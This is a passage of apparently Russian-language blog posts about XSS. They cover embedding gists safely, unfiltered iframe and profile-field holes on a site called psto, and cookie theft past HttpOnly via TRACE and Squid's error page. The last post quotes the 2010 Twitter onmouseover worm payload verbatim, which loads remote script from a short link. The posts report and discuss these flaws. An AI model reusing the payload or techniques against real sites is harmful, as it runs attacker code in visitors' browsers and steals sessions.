to post messages and comments.

XSS

Например, gist можно вставлять в бложики с помощью жаваскрипта, но во избежание всякого XSS возможность вставлять произвольный JS убирают. Как быть?

Сегодня убедился насколько дырявый psto. Путем несложных манипуляцый нашел 3 XSS уязвимости. Если первая куда не шло — не фильтровались iframe и object в тегах( например <iframe src=google.com <), то последние 2 просто убили — в профиле, вместо имени и в поле About можно вводить все что угодно. Подозреваю что дыр там еще предостаточно — лень дальше колупаться.

Как показало сканирование, действительно, всё не так безоблачно, как казалось. Уязвимости далеко не все оправдываются, но есть некоторые потенциально опасные, и довольно хитровыкрученные: например, cgisecurity.com здесь рассказывается о древнем недосмотре, который позволяет своровать кукис в обход HttpOnly, используя TRACE. Так вот, оказывается, Squid, хоть и не пропускает TRACE и TRACK, но при этом шлёт страничку «Invalid Request», и на этой страничке, вуаля, запрос вместе с заголовками!

Увидел своими глазами действие xss-уязвимости в твиттере.
Обратите внимание от кого мне оно пришло.

Twitter (15:19:49 21/09/2010)
Offline message (21.09.2010 15:15:28)
vkontakte (vkontakte): t.co"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/